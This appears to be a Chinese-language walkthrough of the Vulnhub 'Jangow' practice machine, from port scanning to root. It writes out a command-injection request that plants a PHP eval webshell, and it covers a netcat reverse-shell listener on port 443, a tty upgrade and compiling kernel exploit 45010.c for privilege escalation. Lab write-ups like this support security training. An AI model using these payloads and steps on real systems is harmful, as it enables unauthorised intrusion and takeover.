打靶筆記-04-vulnhub-Jangow

WTHusky發表於2022-03-17

打靶筆記-04-vulnhub-Jangow

前面兩篇名稱寫成了vulhub,已經更改為vulnhub;vulhub的之後再找個時間集中打一遍。

一、靶機資訊

Name: Jangow: 1.0.1 (Easy)
Date release: 4 Nov 2021
Author: Jangow
Series: Jangow

二、啟動靶機

2.1 校驗靶機

Img

2.2 匯入Vbox,配置網路

因為攻擊機器都在vmware上,所以還是將靶機網路橋接到vmnet8網路卡上。
Img

2.3 打快照,啟動靶機

沒啥好說的,以防萬一,打個快照啟動
Img
可以直接看到ip地址,不過按照實際中的話時看不到這個介面的。

三、開始打靶

3.1 資訊蒐集

3.1.1 主機發現

ifconfig
sudo arp-scan -I eth0 -l

Img
獲得靶機IP 172.16.95.140

3.1.2 埠發現

sudo nmap -p- 172.16.95.140

Img
只開放22和80埠

3.1.3 進一步確認埠背後服務以及具體版本號

sudo nmap -sV -p22,80 172.16.95.140

Img
可以看到22埠是filtered的狀態,也就是22埠被防火牆過濾了,80埠對應的是Apache httpd 2.4.18

3.1.4 使用nmap預設指令碼掃描

sudo nmap -sC -p22,80 172.16.95.140

Img
貌似沒有啥發現,80埠也掛載的是普通頁面,先看看去

3.2 開始滲透

3.2.1 訪問80埠

Img
是個目錄,繼續點,發現是個網頁,然後裡面有一個目錄連結site,繼續點
Img
最後發現個連結指向一個busque.php檔案,並且擁有引數buscar可以接收值,但不知道幹啥用的,最後經過fuzz測試,確定為命令執行
Img

3.2.2 資訊收集

既然是命令執行,那就可以直接來一波簡單的資訊收集

id
pwd
ls
ls ./wordpress
cat ./wordpress

Img
Img
Img
Img
Img
Img
在進行常規資訊蒐集後,發現有一個wordpress的目錄,並且還獲取到了資料庫賬
不過以上好像沒啥用,資料庫也無法訪問,也沒有更多有用的目錄。

3.2.3 寫入小馬

因為命令執行,所以嘗試了各種姿勢反彈shell,可能是水平不夠,wget也無法下載到遠端伺服器上的馬兒,所以就開始嘗試寫入小馬

http://172.16.95.140/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_POST[%27ant%27]);?%3E%27%20%3E1.php

Img
Img
成功寫入,上蟻劍,連線成功
Img
繼續收集資訊,獲得使用者jangow01家目錄下有個user.txt,內容似乎是md5加密的,可以順手破解一下,不過好像是空的,沒有任何內容,奇怪
Img
翻了翻其他目錄在html目錄下發現.backup檔案,裡面是使用者jangow01的mysql賬戶密碼
Img

然後嘗試上傳反彈shell的php檔案也無法反彈成功

3.2.4 反彈shell

蟻劍雖然連線成功了,但是shell最終還是個webshell,可乾的事兒有限,所以還是的反彈shell提權
經歷過剛剛命令執行反彈shell失敗,然後嘗試上傳反彈shell的php檔案也失敗了,聯想剛開始埠掃描時22埠被過濾的情況,應該是目標機器防火牆搞得鬼。
不過好在目標機器nc可以使用,不過最終也沒有反彈成功,因為它無法帶-e引數。
=-=
打到這兒自己就沒思路了,最後檢視了別人的攻略,這兒的關鍵點在於目標機器防火牆對進出的埠進行了限制,最後嘗試了443埠可以成功利用

nc -lvnp 443

Img
Img

3.2.5 升級shell為tty

which python python2 python3 py py2 py3
python -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm-256color
stty raw -echo;fg

Img

3.2.6 尋找漏洞提權

升級shell之後,就可以sudo和su了,結合之前發現的兩個mysql賬戶名密碼,嘗試了以下切換使用者,結果mysql的賬戶密碼和系統的賬戶密碼一致。
Img
然後嘗試sudo的時候失敗了,好像不是英文,不過看到了個sudoer,猜測應該是提示這個使用者不再sudoer檔案中,也就是沒有sudo的許可權。

那就看看有沒有其他漏洞可以利用吧

uname -r
uname -a
lsb_release -a

Img
ubuntu的版本為16.04.1 LTS

searchsploit Linux Kernel 4.4.

Img
這個搜尋到的有很多看著比較符合,不過這個有點意思的是有個在windows的分類下,有點奇怪,先拿它看看

sudo cp /usr/share/exploitdb/exploits/windows_x86-64/local/47170.c /var/www/html/test.c

Img
然後在目標機器上下載test.c,結果都無法搞定,應該是對方防火牆導致的。
=-=,一會兒提權成功一定要看下它的防火牆策略,最後通過蟻劍傳了過去,不過gcc編譯失敗了
Img
繼續換linux/local/45010.c

sudo cp /usr/share/exploitdb/exploits/linux/local/45010.c ./ 

Img
然後還是通過蟻劍上傳編譯執行,最後成功拿到root許可權

ls
gcc -o exp 45010.c
chmod +x exp
./exp
id

Img

3.2.7 檢視防火牆

bash
sudo ufw status

果然,=-=,禁止訪問任何埠,除了443
Img
關閉防火牆,可以成功訪問,真變態
Img

四、總結

這個靶機難點就是能夠找到唯一可利用的443埠進行反彈shell,沒有這個埠,有再多的反彈姿勢,防火牆攔截的死死的,除非能用webshell進行本地提權,這個不現實,至少對我來說是的,能力不夠
然後看到別人有批量提權的指令碼,先記錄下,隨後的靶機中嘗試以下
linux 提權輔助指令碼
Img
敖~,果然特麼神器=-=
原諒我這個菜雞現在才找到這些神器,應該在自己犯懶的時候先找下有沒有懶人神器,沒有的話自己總結搞一個,加油~~~